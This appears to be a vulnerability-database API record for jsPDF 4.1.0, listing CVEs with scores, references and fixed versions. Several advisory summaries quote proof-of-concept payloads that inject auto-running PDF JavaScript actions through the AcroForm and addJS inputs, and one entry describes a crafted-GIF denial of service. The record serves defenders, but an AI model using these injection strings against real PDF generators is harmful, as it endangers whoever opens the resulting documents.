Package Instance
Look up vulnerable packages by Package URL.
GET /api/packages/73762?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/73762?format=api", "purl": "pkg:npm/jspdf@4.1.0", "type": "npm", "namespace": "", "name": "jspdf", "version": "4.1.0", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "4.2.1", "latest_non_vulnerable_version": "4.2.1", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50247?format=api", "vulnerability_id": "VCID-5hnn-r83k-u3ba", "summary": "jsPDF has a PDF Injection in AcroForm module allows Arbitrary JavaScript Execution (RadioButton.createOption and \"AS\" property)\nUser control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions.\n\nIf given the possibility to pass unsanitized input to the following property, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim hovers over the radio option.\n\n* `AcroformChildClass.appearanceState`\n\nExample attack vector:\n\n```js\nimport { jsPDF } from \"jspdf\"\nconst doc = new jsPDF();\n\nconst group = new doc.AcroFormRadioButton();\ngroup.x = 10; group.y = 10; group.width = 20; group.height = 10;\ndoc.addField(group);\n\nconst child = group.createOption(\"opt1\");\nchild.x = 10; child.y = 10; child.width = 20; child.height = 10;\nchild.appearanceState = \"Off /AA << /E << /S /JavaScript /JS (app.alert('XSS')) >> >>\";\n\ndoc.save(\"test.pdf\");\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25940.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25940.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25940", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00042", 
"scoring_system": "epss", "scoring_elements": "0.13055", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13156", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.1316", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13118", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13023", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25940" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/71ad2dbfa6c7c189ab42b855b782620fa8a38375", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:05Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/71ad2dbfa6c7c189ab42b855b782620fa8a38375" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": 
"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:05Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441016", "reference_id": "2441016", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441016" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25940", "reference_id": "CVE-2026-25940", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25940" }, { "reference_url": "https://github.com/advisories/GHSA-p5xg-68wr-hm3m", "reference_id": "GHSA-p5xg-68wr-hm3m", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p5xg-68wr-hm3m" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-p5xg-68wr-hm3m", "reference_id": "GHSA-p5xg-68wr-hm3m", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:05Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-p5xg-68wr-hm3m" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7110", "reference_id": "RHSA-2026:7110", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7110" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7128", "reference_id": "RHSA-2026:7128", 
"reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7128" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/74149?format=api", "purl": "pkg:npm/jspdf@4.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-h1m4-jwms-tqee" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.2.0" } ], "aliases": [ "CVE-2026-25940", "GHSA-p5xg-68wr-hm3m" ], "risk_score": 4.3, "exploitability": "0.5", "weighted_severity": "8.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5hnn-r83k-u3ba" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/64816?format=api", "vulnerability_id": "VCID-6pvn-kfpj-e3g7", "summary": "jspdf: jsPDF: Arbitrary code execution via unsanitized input in createAnnotation method", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31898.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31898.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31898", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14608", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14703", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14709", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14667", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14584", "published_at": 
"2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31898" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/blob/b1607a9391d4cd65ea7ade25998aea8345ae1be3/src/modules/annotations.js#L193-L208", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T14:00:36Z/" } ], "url": "https://github.com/parallax/jsPDF/blob/b1607a9391d4cd65ea7ade25998aea8345ae1be3/src/modules/annotations.js#L193-L208" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/4155c4819d5eca284168e51e0e1e81126b4f14b8", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T14:00:36Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/4155c4819d5eca284168e51e0e1e81126b4f14b8" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", 
"scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T14:00:36Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.1" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-7x6v-j9x4-qf24", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T14:00:36Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-7x6v-j9x4-qf24" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31898", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31898" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448547", "reference_id": "2448547", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448547" }, { "reference_url": "https://github.com/advisories/GHSA-7x6v-j9x4-qf24", "reference_id": "GHSA-7x6v-j9x4-qf24", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7x6v-j9x4-qf24" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7110", "reference_id": "RHSA-2026:7110", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7110" }, { "reference_url": 
"https://access.redhat.com/errata/RHSA-2026:7128", "reference_id": "RHSA-2026:7128", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7128" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112985?format=api", "purl": "pkg:npm/jspdf@4.2.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.2.1" } ], "aliases": [ "CVE-2026-31898", "GHSA-7x6v-j9x4-qf24" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6pvn-kfpj-e3g7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50253?format=api", "vulnerability_id": "VCID-fdf6-8j56-qqc6", "summary": "jsPDF Affected by Client-Side/Server-Side Denial of Service via Malicious GIF Dimensions\nUser control of the first argument of the `addImage` method results in denial of service.\n\nIf given the possibility to pass unsanitized image data or URLs to the `addImage` method, a user can provide a harmful GIF file that results in out of memory errors and denial of service. 
Harmful GIF files have large width and/or height entries in their headers, which lead to excessive memory allocation.\n\nOther affected methods are: `html`.\n\nExample attack vector:\n\n```js\nimport { jsPDF } from \"jspdf\"\n\n// malicious GIF image data with large width/height headers\nconst payload = ...\n\nconst doc = new jsPDF();\n\ndoc.addImage(payload, \"GIF\", 0, 0, 100, 100);\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25535.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25535.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25535", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00084", "scoring_system": "epss", "scoring_elements": "0.24397", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00084", "scoring_system": "epss", "scoring_elements": "0.24514", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00084", "scoring_system": "epss", "scoring_elements": "0.24501", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00084", "scoring_system": "epss", "scoring_elements": "0.24444", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00084", "scoring_system": "epss", "scoring_elements": "0.24386", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25535" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": 
"https://github.com/parallax/jsPDF/commit/2e5e156e284d92c7d134bce97e6418756941d5e6", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-19T16:03:04Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/2e5e156e284d92c7d134bce97e6418756941d5e6" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-19T16:03:04Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440992", "reference_id": "2440992", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440992" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25535", "reference_id": "CVE-2026-25535", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25535" }, { "reference_url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25535.md", "reference_id": "CVE-2026-25535.MD", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": 
"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-19T16:03:04Z/" } ], "url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25535.md" }, { "reference_url": "https://github.com/advisories/GHSA-67pg-wm7f-q7fj", "reference_id": "GHSA-67pg-wm7f-q7fj", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-67pg-wm7f-q7fj" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-67pg-wm7f-q7fj", "reference_id": "GHSA-67pg-wm7f-q7fj", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-19T16:03:04Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-67pg-wm7f-q7fj" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7110", "reference_id": "RHSA-2026:7110", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7110" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7128", "reference_id": "RHSA-2026:7128", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7128" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/74149?format=api", "purl": "pkg:npm/jspdf@4.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-h1m4-jwms-tqee" } 
], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.2.0" } ], "aliases": [ "CVE-2026-25535", "GHSA-67pg-wm7f-q7fj" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fdf6-8j56-qqc6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/64815?format=api", "vulnerability_id": "VCID-h1m4-jwms-tqee", "summary": "jspdf: jsPDF: Cross site scripting via unsanitized output options", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31938.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31938.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31938", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16072", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16188", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16179", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16136", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16049", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31938" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], 
"url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/87a40bbd07e6b30575196370670b41f264aa78d7", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T13:59:39Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/87a40bbd07e6b30575196370670b41f264aa78d7" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T13:59:39Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.1" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-wfv2-pwc8-crg5", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T13:59:39Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-wfv2-pwc8-crg5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31938", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", 
"scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31938" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448550", "reference_id": "2448550", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448550" }, { "reference_url": "https://github.com/advisories/GHSA-wfv2-pwc8-crg5", "reference_id": "GHSA-wfv2-pwc8-crg5", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wfv2-pwc8-crg5" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7110", "reference_id": "RHSA-2026:7110", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7110" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7128", "reference_id": "RHSA-2026:7128", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7128" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112985?format=api", "purl": "pkg:npm/jspdf@4.2.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.2.1" } ], "aliases": [ "CVE-2026-31938", "GHSA-wfv2-pwc8-crg5" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-h1m4-jwms-tqee" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50260?format=api", "vulnerability_id": "VCID-hu3v-vhnb-kuhw", "summary": "jsPDF has a PDF Object Injection via Unsanitized Input in addJS Method\nUser control of the argument of the `addJS` method allows an attacker to inject arbitrary PDF objects into the generated document. 
By crafting a payload that escapes the JavaScript string delimiter, an attacker can execute malicious actions or alter the document structure, impacting any user who opens the generated PDF.\n\n```js\nimport { jsPDF } from \"jspdf\";\nconst doc = new jsPDF();\n// Payload:\n// 1. ) closes the JS string.\n// 2. > closes the current dictionary.\n// 3. /AA ... injects an \"Additional Action\" that executes on focus/open.\nconst maliciousPayload = \"console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>\";\n\ndoc.addJS(maliciousPayload);\ndoc.save(\"vulnerable.pdf\");\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25755.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25755.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25755", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07631", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07676", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07689", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07663", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07619", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25755" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/56b46d45b052346f5995b005a34af5dcdddd5437", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:08Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/56b46d45b052346f5995b005a34af5dcdddd5437" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:08Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440993", "reference_id": "2440993", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440993" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25755", "reference_id": "CVE-2026-25755", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" 